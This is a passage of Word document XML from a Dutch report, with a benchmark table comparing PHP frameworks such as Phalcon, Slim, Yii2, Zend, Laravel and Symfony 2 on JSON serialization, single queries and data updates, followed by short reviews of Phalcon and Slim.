            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="003E72A9">
              <w:t xml:space="preserve"> (hoe lager hoe beter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E72A9" w14:paraId="0A1A43EF" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35306C12" w14:textId="17551E6A" w:rsidR="007D753D" w:rsidRDefault="001E5A83">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Phalcon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DAEB127" w14:textId="3A633BA3" w:rsidR="007D753D" w:rsidRDefault="005D5E1E">
            <w:r>
              <w:t>39,865 (7.1%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51CEEB00" w14:textId="242634D1" w:rsidR="007D753D" w:rsidRDefault="00F90C0F">
            <w:r>
              <w:t>50.0 ms (3.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E72A9" w14:paraId="6FF7B9D5" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CACCEA3" w14:textId="377C96F5" w:rsidR="007D753D" w:rsidRDefault="001E5A83">
            <w:r>
              <w:t>Yii2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C80207F" w14:textId="33CCA03F" w:rsidR="007D753D" w:rsidRDefault="001D50E1">
            <w:r>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="007E2397">
              <w:t>,388 (1.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A6BADCF" w14:textId="0177B55A" w:rsidR="007D753D" w:rsidRDefault="00D84EEF">
            <w:r>
              <w:t>27.1 ms (2.1%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="267E99A7" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DA12634" w14:textId="3C763F36" w:rsidR="00267929" w:rsidRDefault="00267929">
            <w:r>
              <w:t>Zend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A435C3F" w14:textId="5067E5E1" w:rsidR="00267929" w:rsidRDefault="00267929">
            <w:r>
              <w:t>9,784 (1.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0536E868" w14:textId="75881E85" w:rsidR="00267929" w:rsidRDefault="00013A6C">
            <w:r>
              <w:t>31.1 ms (</w:t>
            </w:r>
            <w:r w:rsidR="00711493">
              <w:t>2.4%</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="31A9E726" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="292"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C92E8FE" w14:textId="2E0AA2DC" w:rsidR="00267929" w:rsidRDefault="00267929">
            <w:r>
              <w:t>Slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B011D36" w14:textId="25E2085A" w:rsidR="00267929" w:rsidRDefault="00267929">
            <w:r>
              <w:t>9.640 (1.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14CA584B" w14:textId="00DE2A97" w:rsidR="00267929" w:rsidRDefault="00711493">
            <w:r>
              <w:t>34.3 ms (2.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="5E486259" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C953663" w14:textId="4AFFD1F9" w:rsidR="00267929" w:rsidRDefault="00267929">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Laravel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63544BEE" w14:textId="20C4DD01" w:rsidR="00267929" w:rsidRDefault="00267929">
            <w:r>
              <w:t>7,020 (1.3%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33F1CCBE" w14:textId="3BC766DB" w:rsidR="00267929" w:rsidRDefault="00711493">
            <w:r>
              <w:t>38.0 ms (3.0%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="2D981BF8" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB9370D" w14:textId="43F5354B" w:rsidR="00267929" w:rsidRDefault="00267929">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Symfony</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B81E503" w14:textId="74BF9737" w:rsidR="00267929" w:rsidRDefault="00267929">
            <w:r>
              <w:t>3,588 (0.6%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="113B5E2A" w14:textId="5DDEC992" w:rsidR="00267929" w:rsidRDefault="00CA5808">
            <w:r>
              <w:t>74.3 ms (5.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6B3A" w14:paraId="1B2C0363" w14:textId="77777777" w:rsidTr="004F6B3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000" w:themeFill="accent4"/>
          </w:tcPr>
          <w:p w14:paraId="605AEC67" w14:textId="1C228DCA" w:rsidR="004F6B3A" w:rsidRDefault="004F6B3A">
            <w:r w:rsidRPr="00E02B28">
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Enkele query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B173C" w14:paraId="2429747C" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC644A9" w14:textId="56559B93" w:rsidR="002B173C" w:rsidRDefault="002B173C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Phalcon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5744DED6" w14:textId="4DEF5134" w:rsidR="002B173C" w:rsidRDefault="00F53002">
            <w:r>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="001F09AC">
              <w:t>,604 (10.8%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0825909C" w14:textId="44B85A00" w:rsidR="002B173C" w:rsidRDefault="009B5320">
            <w:r>
              <w:t>29.4 ms (1.0%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="252B61DB" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4509D17A" w14:textId="6E7CE1EE" w:rsidR="00B4687D" w:rsidRDefault="00B4687D">
            <w:r>
              <w:t>Slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24B5FCCE" w14:textId="01F567A7" w:rsidR="00B4687D" w:rsidRDefault="00B4687D">
            <w:r>
              <w:t>9,779 (4.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74B02940" w14:textId="2DC1BB22" w:rsidR="00B4687D" w:rsidRDefault="00DA1DA2">
            <w:r>
              <w:t>29.3 ms (</w:t>
            </w:r>
            <w:r w:rsidR="00730FFA">
              <w:t>1.0%</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="752DA909" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B0C949C" w14:textId="6554D0C2" w:rsidR="00B4687D" w:rsidRDefault="00B4687D">
            <w:r>
              <w:t>Yii2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CADF8D2" w14:textId="0F9A0011" w:rsidR="00B4687D" w:rsidRDefault="00B4687D">
            <w:r>
              <w:t>6,789 (3.2%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="092F4318" w14:textId="0C432B75" w:rsidR="00B4687D" w:rsidRDefault="001C029D">
            <w:r>
              <w:t>39.6 ms (1.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="2086DE02" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77DF8EE2" w14:textId="0CAE7333" w:rsidR="00B4687D" w:rsidRDefault="00B4687D">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Laravel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56797461" w14:textId="035D5B2B" w:rsidR="00B4687D" w:rsidRDefault="00B4687D">
            <w:r>
              <w:t>5,385 (2.6%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C7285E2" w14:textId="4F7D3554" w:rsidR="00B4687D" w:rsidRDefault="00540F9E">
            <w:r>
              <w:t>51.9 ms (1.8%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="155D61D6" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CDA76BA" w14:textId="1A2F77A3" w:rsidR="00B4687D" w:rsidRDefault="00B4687D">
            <w:r>
              <w:t>Zend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44099F47" w14:textId="5FAB4E24" w:rsidR="00B4687D" w:rsidRDefault="00B4687D">
            <w:r>
              <w:t>3,965 (1.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40303B3D" w14:textId="6D8C4D10" w:rsidR="00B4687D" w:rsidRDefault="000B1156">
            <w:r>
              <w:t>67.9 ms (2.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B173C" w14:paraId="56F8FB70" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3360ECF2" w14:textId="28D2DB0B" w:rsidR="002B173C" w:rsidRDefault="002B173C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Symfony</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="286ED64F" w14:textId="56BA298A" w:rsidR="002B173C" w:rsidRDefault="001C7B9A">
            <w:r>
              <w:t>2,508 (1.2%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F2058BC" w14:textId="237B7653" w:rsidR="002B173C" w:rsidRDefault="00E44FC8">
            <w:r>
              <w:t>105.4 ms (3.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B723C" w14:paraId="02038873" w14:textId="77777777" w:rsidTr="001B723C">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="0BA6331D" w14:textId="78654F47" w:rsidR="001B723C" w:rsidRDefault="001B723C">
            <w:r w:rsidRPr="001B723C">
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Data updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="7A1DE790" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58A3F147" w14:textId="3E83BD47" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:r>
              <w:t>Slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="246C1F8A" w14:textId="498A4E27" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:r>
              <w:t>768 (17.5%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6302B671" w14:textId="39939FA1" w:rsidR="00CA1C66" w:rsidRDefault="00A43F92">
            <w:r>
              <w:t>330.0 ms (5.7</w:t>
            </w:r>
            <w:r w:rsidR="00EE5C77">
              <w:t>%</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="713D5624" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5718668E" w14:textId="47302381" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:r>
              <w:t>Zend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E234C6C" w14:textId="49B36C07" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:r>
              <w:t>766 (17.5%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B37A839" w14:textId="20A6C9AC" w:rsidR="00CA1C66" w:rsidRDefault="00EE5C77">
            <w:r>
              <w:t>330.4 ms (5.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="679093C9" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72111F8E" w14:textId="1DBC4555" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:r>
              <w:t>Yii2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F46DCB" w14:textId="0D8A486C" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:r>
              <w:t>762 (17.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D24CB1A" w14:textId="558ADB94" w:rsidR="00CA1C66" w:rsidRDefault="008579C8">
            <w:r>
              <w:t>332.2 ms (5.8%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="4862C11B" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="040C3A34" w14:textId="4956C904" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Phalcon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64217CE2" w14:textId="0B1FF7BC" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:r>
              <w:t>642 (14.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73C0D971" w14:textId="6762DF04" w:rsidR="00CA1C66" w:rsidRDefault="004E44CE">
            <w:r>
              <w:t>398.4 ms (6.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00651762" w14:paraId="789CB71E" w14:textId="77777777" w:rsidTr="00353384">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2375A979" w14:textId="19F5A086" w:rsidR="00651762" w:rsidRDefault="00651762">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Symfony</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F33E7A" w14:textId="6D3B917A" w:rsidR="00651762" w:rsidRDefault="00651762">
            <w:r>
              <w:t>321 (7.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55B0BF03" w14:textId="7833A85F" w:rsidR="00651762" w:rsidRDefault="003C5ACC">
            <w:r>
              <w:t>490</w:t>
            </w:r>
            <w:r w:rsidR="00531E3F">
              <w:t>.8 ms (8.5%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="6D12D8FA" w14:textId="77777777" w:rsidTr="00353384">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A6495C" w14:textId="36045AF9" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Laravel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46591382" w14:textId="34A0BED3" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:r>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="624E334C" w14:textId="15C57C79" w:rsidR="00CA1C66" w:rsidRDefault="00CA1C66">
            <w:r>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E65B833" w14:textId="6FA09A7F" w:rsidR="00F35514" w:rsidRDefault="008705FB" w:rsidP="00F35514">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tabel  3.5</w:t>
      </w:r>
      <w:r w:rsidR="00F35514">
        <w:t>.1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F35514">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0041492C">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00F35514">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0041492C">
        <w:t>benchmark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009D02E6" w14:textId="12418722" w:rsidR="00E516D4" w:rsidRPr="00E516D4" w:rsidRDefault="00E516D4" w:rsidP="0041492C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E516D4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Performance reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472D0E17" w14:textId="2682754E" w:rsidR="00270A6F" w:rsidRPr="00270A6F" w:rsidRDefault="00270A6F" w:rsidP="0041492C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00270A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Phalcon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="027B692A" w14:textId="33CFD50C" w:rsidR="0041492C" w:rsidRPr="0041492C" w:rsidRDefault="00192B2A" w:rsidP="0041492C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Phal</w:t>
      </w:r>
      <w:r w:rsidR="00447E55">
        <w:t>con</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00447E55">
        <w:t xml:space="preserve"> scoort verre weg het hoogst met</w:t>
      </w:r>
      <w:r w:rsidR="004D2B00">
        <w:t xml:space="preserve"> het uitvoeren van</w:t>
      </w:r>
      <w:r w:rsidR="00447E55">
        <w:t xml:space="preserve"> JSON</w:t>
      </w:r>
      <w:r w:rsidR="00402216">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00402216">
        <w:t>serialisatie</w:t>
      </w:r>
      <w:r w:rsidR="001C6015">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C6015">
        <w:t xml:space="preserve"> en Enkele </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C6015">
        <w:t>queries</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C6015">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00084AFE">
        <w:t>Phalcon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00084AFE">
        <w:t xml:space="preserve"> is een PHP-extensie geschreven in C, in 2012 uitgebracht en is gebouwd voor snelheid zoals je kunt terugvinden in de benchmark onderzoek. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A240A40" w14:textId="77777777" w:rsidR="00270A6F" w:rsidRDefault="00270A6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00270A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F39AA00" w14:textId="7561F4E8" w:rsidR="003A50D9" w:rsidRDefault="00A97691">
      <w:r>
        <w:t xml:space="preserve">Slim eindigt als tweede in het benchmark van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>techempowerd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00385EDD">
        <w:t xml:space="preserve"> maar, scoort het hoogst op Data Updates wat een best zwaar belanden opdracht is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0028476C">
        <w:t>Slim</w:t>
      </w:r>
      <w:r w:rsidR="006908DF">
        <w:t xml:space="preserve"> is een Micro F</w:t>
      </w:r>
      <w:r w:rsidR="00D3766B">
        <w:t xml:space="preserve">ramework met een </w:t>
      </w:r>
      <w:r w:rsidR="0028476C">
        <w:t xml:space="preserve">lage </w:t>
      </w:r>
      <w:r w:rsidR="00D3766B">
        <w:t>leerdrempel heeft</w:t>
      </w:r>
      <w:r w:rsidR="006908DF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007D3602">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D3602">
        <w:t xml:space="preserve">Slim is het best geschikt voor </w:t>
      </w:r>
      <w:r w:rsidR="008C6FDE">
        <w:t>kleine</w:t>
      </w:r>
      <w:r w:rsidR="00F14544">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008C6FDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D3602">
        <w:t>simpele projecten of voor het bouwen van een simpele, flexibele API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B18407" w14:textId="77777777" w:rsidR="003A50D9" w:rsidRDefault="00C93B0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
